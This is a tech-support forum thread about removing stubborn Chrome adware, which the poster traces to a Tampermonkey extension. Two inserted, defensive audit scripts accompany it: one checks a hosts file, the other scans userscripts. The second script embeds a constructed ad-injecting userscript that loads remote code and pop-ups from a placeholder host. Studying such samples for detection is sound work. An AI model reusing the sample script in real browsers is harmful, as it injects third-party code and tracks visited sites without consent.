HUGE mystery: Can't get Adware to go away no matter what I do?

angelness

Prominent
Apr 9, 2017
10
0
570
Adware has always been a joke to me. In the past, I've managed to easily remove it from my grandparents' PC or wherever I saw it. It's almost always either a toolbar or an extension. However, recently my PC has become infected and no matter what I do, IT WON'T GO AWAY! I've tried EVERYTHING and I'm really desperate :( This really is a huge mystery to me! I keep getting outbound requests from Google Chrome to sketchy websites, but Malwarebytes keeps blocking them.

Here is the list of things I've tried to get rid of it:
• Checked to see if there is any unwanted installed software
• Scanned my PC with 2 antivirus programs multiple times and always got a clean result (Malwarebytes and Norton)
• Used Adware Cleaner (which did manage to detect and remove several infections, but I guess it came back and now it's not detecting anything)
• Changed my router's DNS server
• Flushed the DNS server
• Restarted my router
• Checked to see if there was a homepage for an unwanted website (there was and I removed it)
• Checked to see if there was an unwanted website added to my browser's shortcut
• Checked to see if there was an unwanted extension installed
• Uninstalled and reinstalled Google Chrome
• Cleared all the cookies
• Completely cleared everything off my browser
• Used CCleaner on my PC
• Googled how to remove the specific adware and followed the steps
• Installed Hitman Pro and it detected nothing

Things I should mention: this problem first started on my laptop, but then I built my first ever PC and the problem migrated over here for some reason. Same websites as well (always Tradeexchange and PopCash). The adware never shows up, though. My firewall always tells me that it has blocked it. But I fear that they are adding more adware to my PC, since sometimes I get 3 or 4 pop-ups from different websites. They only pop up when I use Google Chrome. I think one tried to pop up when I used Microsoft Edge, but the notification popped up immediately when I clicked a link, and the outbound request was from a different website than usual. I barely use Mozilla Firefox, so I don't know if it pops up from there.

Please help me: in one month, I have had 800+ pop-ups blocked by Malwarebytes. They are really annoying. Any help would be HIGHLY appreciated!

Screenshot of Malwarebytes reports:
a4fa17f0feb222a854eb9b8aa7f6ec38.gif
 
Solution
Hello, everyone! It's been about a week and the pop-ups seem to have finally gone away! The nightmare seems to be finally over.
This might be premature, who knows, but this is the longest I've ever gone without a single pop-up.

So to anyone who might be reading this and might have this exact problem, let me tell you what I did:
1) At least try everything listed in the original post
2) Uninstalled Tampermonkey
3) Uninstalled any unnecessary add-ons/plug-ins (EVEN THE ONES I TRUSTED)
4) On Chrome went to Settings > Advanced > Privacy and Security > Content Settings > Cookies and then I cleared everything that was unfamiliar to me or unwanted under "All cookies and site data" and then under "Block...

Herc08

Respectable
Aug 6, 2016
236
0
1,910
Well, you pretty much did everything I would suggest except format your hard drive and reinstall Windows. I would also uninstall any extensions you may have in Chrome as well.
 

angelness


Reinstalling Windows/reformatting the hard drive wouldn't work, since this problem came from my old laptop or because I visited a site again. It might have transferred from one computer to another, but I don't know if it's because I have a router infection or if it's because I have Google Chrome synced to an account. Also, my phone and tablets don't have this problem. I've also tried uninstalling every extension and the problem still persists. Also, I didn't do that list in order, nor did I do them together in the same session.

Do you have a list of steps you'd recommend (besides reformatting the hard drive/reinstalling Windows)? It is adware after all. Hopefully, there is a way to remove it. I might just be overlooking something.
 

Karadjgne

Distinguished
Herald
Sounds suspiciously like the Hosts file has been tampered with.
When you ran Malwarebytes, did you have it set to check for rootkits?
Try using Spybot - Search & Destroy; it has settings to lock the Hosts file. When you run it (after full updates), do so with the internet unplugged physically. You'll get a warning if anything is trying to change the Hosts file, and should be able to backtrack.
 

angelness


Yeah, I have the setting turned on for rootkits in Malwarebytes. I've also used Malwarebytes' separate Anti-Rootkit finder.
I'll try your suggestion in an hour or so, but before I do, what do you mean by backtrack? What exactly am I looking for? Will I have to manually rewrite the hosts file? I've tweaked it in the past, so I have the original copy of it. Will replacing it with the original fix it? Also, is the free version of Spybot - Search & Destroy good enough?
 

Karadjgne
Having a Hosts file prior to all this happening would be great! Yes, the free version is fine. What you do is run everything you can but don't reboot/reset. This deletes all that can be deleted, without the sleeper program searching for installed files. Then you add a copy of the original hosts file and lock it down. Only after that do you reset. Upon reset, while windows is loading, the sleeper program will go looking for installed files and won't find them, so will try to re-add them, especially to the Hosts file, but that's now locked out to changes. This'll throw up a warning that some program is trying to throw you a loop, you'll get to see what program this is. It'll be something usually in the windows/program files folder and has ties in the registry. This is when you can use something like CCleaner to clean out the registry, which looks for those oddball files that lead nowhere.

No Antivirus/malware software is perfect. They rely on user input to send the devs reports and malware so they can design and interpret necessary actions. This is why MB missed, Norton missed, but the other program found something.

You should also go into your browsers, IE and Chrome etc., and under settings/add-ons or extensions make sure to deny popcash.net, or delete it etc., or every time you start a browser it'll search out that extension, not find it, so will download and replace it, basically making you start all over again with the malware removal process.
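The Hosts-file check suggested above, written out as an added example (this is not code from the thread or from Spybot; it is a stand-alone audit script). It assumes the reader kept a known-good copy of the hosts file, as the poster says they did, and compares the live file against it: any mapping the baseline lacks is classified as a redirect (a name pointing at a real address, i.e. a hijacked site), a sinkholed security-vendor domain (adware sometimes blackholes AV update/download hosts), or a plain block. The hosts contents, the vendor list and the default Windows path are constructed or assumed for the demo.

```python
"""Audit a Windows hosts file for adware-style tampering.

Added example, not code from the thread.  It parses hosts-file text and
compares it with a known-good baseline copy, classifying every mapping the
baseline does not contain:

  redirect        name resolves to a real address, i.e. the site is hijacked
  vendor_blocked  a security vendor's domain is sinkholed so updates fail
  block           some other name is sinkholed (normal for ad-block lists)
  removed         a baseline entry is gone

The hosts text below is constructed for the demo.  The live file on Windows
is normally C:\\Windows\\System32\\drivers\\etc\\hosts (assumed default path).
"""
import ipaddress
from collections import Counter
from pathlib import Path

# Addresses that sinkhole a name rather than redirect it.
BLACKHOLE = {"0.0.0.0", "127.0.0.1", "::1", "::"}

# Domains adware commonly sinkholes to cripple clean-up.  Assumed list;
# extend it with whatever tools you actually rely on.
NEVER_BLOCK = ("malwarebytes.com", "norton.com", "microsoft.com", "windowsupdate.com")

WINDOWS_HOSTS = Path(r"C:\Windows\System32\drivers\etc\hosts")


def parse_hosts(text):
    """Return [(ip, hostname, line_number)] for every active mapping."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue                              # not an address: skip line
        for host in parts[1:]:
            entries.append((parts[0], host.lower(), lineno))
    return entries


def _is_protected(host):
    return any(host == d or host.endswith("." + d) for d in NEVER_BLOCK)


def audit_hosts(current_text, baseline_text):
    """Classify every mapping that differs from the baseline."""
    baseline = {(ip, host) for ip, host, _ in parse_hosts(baseline_text)}
    current = parse_hosts(current_text)
    findings = []
    for ip, host, lineno in current:
        if (ip, host) in baseline:
            continue
        if ip not in BLACKHOLE:
            kind = "redirect"
        elif _is_protected(host):
            kind = "vendor_blocked"
        else:
            kind = "block"
        findings.append({"kind": kind, "ip": ip, "host": host, "line": lineno})
    present = {(ip, host) for ip, host, _ in current}
    for ip, host in sorted(baseline - present):
        findings.append({"kind": "removed", "ip": ip, "host": host, "line": None})
    return findings


def summarize(findings):
    """Count findings per kind (a missing kind reads as 0)."""
    return Counter(f["kind"] for f in findings)


# --- constructed sample data (not real files) --------------------------------
BASELINE = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
"""

TAMPERED = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
# ::1 localhost        <- baseline entry commented out
198.51.100.7    www.google.com google.com
0.0.0.0         malwarebytes.com www.malwarebytes.com
127.0.0.1       ads.example.net
"""

if __name__ == "__main__":
    text = WINDOWS_HOSTS.read_text() if WINDOWS_HOSTS.exists() else TAMPERED
    for f in audit_hosts(text, BASELINE):
        print(f"{f['kind']:<15} line {f['line']!s:<5} {f['ip']:<16} {f['host']}")
```

Run it as administrator on the affected machine and review every `redirect` and `vendor_blocked` line; `block` entries are only a problem if you did not put them there. The comparison is by (address, name) pair, so a baseline name re-pointed at a new address shows up as both `removed` and `redirect`.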
 

TMTOWTSAC

Estimable
Jun 27, 2015
97
0
4,610
Have you tried using a different browser to see if it's Chrome specific or not? Also, just to verify do you get that traffic occurring everywhere? Or only when you visit certain sites?
 

angelness


Apologies for the late response. For some odd reason, my email notifications did not alert me of any responses and I got caught up with work. I don't understand what you mean by "run everything you can but don't reboot/reset". Do you mean run every program I can, or something else? I apologize for not understanding.

Also for the browser, there are no settings to deny any extensions from any website.
57e77a312dade0ae80b25e7af7b6ad48.png


However I did try this:
bzcO4it.png

Is this good enough?
 

angelness


I downloaded and scanned my PC with this but I'm not exactly sure what I'm looking for. Is there anything specific I should keep an eye out for?
 

angelness


I did what you suggested and I came out clean. Perhaps it might be a router malware?
214df544ae2576f8764f35058f35223b.png
 

mdd1963

Distinguished


The things highlighted in green are whitelisted, known processes, so exempt from decision making.

Many others you will quickly recognize from their respective folders/locations, such as DropBox, SecureAge, Intel, Apple, etc.

Every single non-green (whitelisted) entry should be reviewed.

If you want to stretch out your display and grab printscreen/screenshots of various entries, I'd be glad to see if anything looks suspect

Example with my own Freefixer scan results:
http://s254.photobucket.com/user/mdd1963/media/2017-07-05.png.html?sort=3&o=0
 

angelness


No. It seems to pop up randomly at any given time. However, I do notice it more on any Google related websites such as Google Images, YouTube, and even opening up a new tab on Chrome.
 

angelness


Thank you for your help. Here's my screenshots of the results:

Screenshot 1:
4261478b6c7052dfc8a7b51b94b42519.png


Screenshot 2:
ddca12302cc5f5b411f1580e89e740d4.png


Screenshot 3:
9bb82d18fe127dbe04b7985ca0ca3f77.png


Screenshot 4:
cd2814351c2cbecf731dbe74f137be9d.png


Screenshot 5:
37acd04c87dfc60ccf70d07ba0a4fcfb.png


Screenshot 6:
457ad032ddf7c8a73da886e9ec8860fc.png


Screenshot 7:
47c003ed68280727ff3ddd798086f61e.png


I have a lot of pop-up blockers/adblock/blocking of other stuff, since I've been trying to block any more possible adware. I've been a bit paranoid, to say the least.
 

angelness
Well, no one has really posted anything on here in a while, but I think I found the solution, maybe. For the first time ever, Tradeexchange and PopCash haven't tried to pop up for several days. I believe the Chrome extension "Tampermonkey" was infected with adware or something. I googled "Tampermonkey adware" and it seems to be a common problem. I'll post an update in a week to see if it has gone away.
 

Karadjgne
Extensions are BHOs (browser helper objects), so as such are not regulated by any antivirus or malware sniffers. Having one infected / sourced by malware will definitely bypass any searches, as it only opens up a Trojan-like pop-up when the browser is opened, but can thereby reinfect the entire network every time it's used. So you clean out the PC, open Chrome, and whammo! Right back where you started from, all nicely infected.
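An added example for the Tampermonkey finding above (not code from the thread, from Tampermonkey, or from any named product). Tampermonkey runs userscripts, and the assumption here is that the adware arrived as one: the script below parses a userscript's `==UserScript==` header and body and flags the traits an ad-injecting script shows, namely a `@match`/`@include` that covers every site, remote code pulled in via `@require`, a `<script>` element injected with a remote `src`, `window.open` pop-ups, and `eval`/`new Function`. Both scripts it scans are constructed samples with placeholder hostnames; to audit real ones, export the installed scripts from the Tampermonkey dashboard and feed each file to `audit_userscript()`.

```python
"""Audit Tampermonkey/Greasemonkey userscripts for adware behaviour.

Added example, not from the thread.  It assumes the adware was delivered as
a userscript and looks for the traits such scripts show.  Both sample scripts
below are constructed; the hostnames are placeholders, not real ad networks.
"""
import re

HEADER_RE = re.compile(r"//\s*==UserScript==\s*(.*?)//\s*==/UserScript==", re.S)
META_RE = re.compile(r"^\s*//\s*@(\w+)\s+(.*?)\s*$", re.M)
BROAD_SCOPES = {"*", "*://*/*", "http*://*/*", "http://*/*", "https://*/*"}
SRC_RE = re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)""")
SCRIPT_TAG_RE = re.compile(r"""createElement\(\s*['"]script['"]\s*\)""")
POPUP_RE = re.compile(r"\bwindow\.open\s*\(")
EVAL_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(")


def parse_userscript(text):
    """Split a userscript into (metadata dict, code body); None if no header."""
    m = HEADER_RE.search(text)
    if not m:
        return None
    meta = {}
    for key, value in META_RE.findall(m.group(1)):
        meta.setdefault(key, []).append(value)   # keys may repeat (@match)
    return meta, text[m.end():]


def audit_userscript(text):
    """Return human-readable findings; an empty list means nothing flagged."""
    parsed = parse_userscript(text)
    if parsed is None:
        return ["no ==UserScript== header; not a userscript"]
    meta, body = parsed
    findings = []
    scopes = meta.get("match", []) + meta.get("include", [])
    if any(s.strip() in BROAD_SCOPES for s in scopes):
        findings.append("broad scope: runs on every site")
    for url in meta.get("require", []):
        findings.append(f"remote code via @require: {url.strip()}")
    if any("xmlhttprequest" in g.lower() for g in meta.get("grant", [])):
        findings.append("grant: cross-origin requests from any page")
    if SCRIPT_TAG_RE.search(body):                # script tag built at runtime
        for url in SRC_RE.findall(body):
            findings.append(f"injects remote script: {url}")
    if POPUP_RE.search(body):
        findings.append("opens pop-up windows")
    if EVAL_RE.search(body):
        findings.append("dynamic code execution (eval/new Function)")
    return findings


# --- constructed sample userscripts -----------------------------------------
BENIGN = """// ==UserScript==
// @name         GitHub wide diff
// @match        https://github.com/*
// @grant        none
// ==/UserScript==
document.querySelectorAll('.container-xl').forEach(e => e.style.maxWidth = '100%');
"""

SUSPICIOUS = """// ==UserScript==
// @name         Video Downloader Helper+
// @match        *://*/*
// @grant        GM_xmlhttpRequest
// @require      https://cdn.example-ads.net/lib.js
// ==/UserScript==
(function () {
  var s = document.createElement('script');
  s.src = 'https://ads.example.net/pop.js?ref=' + encodeURIComponent(location.host);
  document.head.appendChild(s);
  setInterval(function () { window.open('https://ads.example.net/offer'); }, 600000);
})();
"""

if __name__ == "__main__":
    for label, script in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, audit_userscript(script) or ["clean"])
```

A script that runs on every site and loads code from a host you do not recognise is exactly the pattern that produces pop-ups on unrelated pages, including Google's own, and survives a browser reinstall when the extension and its scripts are synced back from the account. A hit is a reason to read the script, not proof of malice: legitimate scripts also use `@require` and broad matches.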
 

mdd1963
Nothing is really jumping out at me as being obviously suspicious on Freefixer, unfortunately.

You could certainly delete any/all 'not-well-known' ad-blockers from assorted browsers.

Delete them everywhere they show on Freefixer, as well.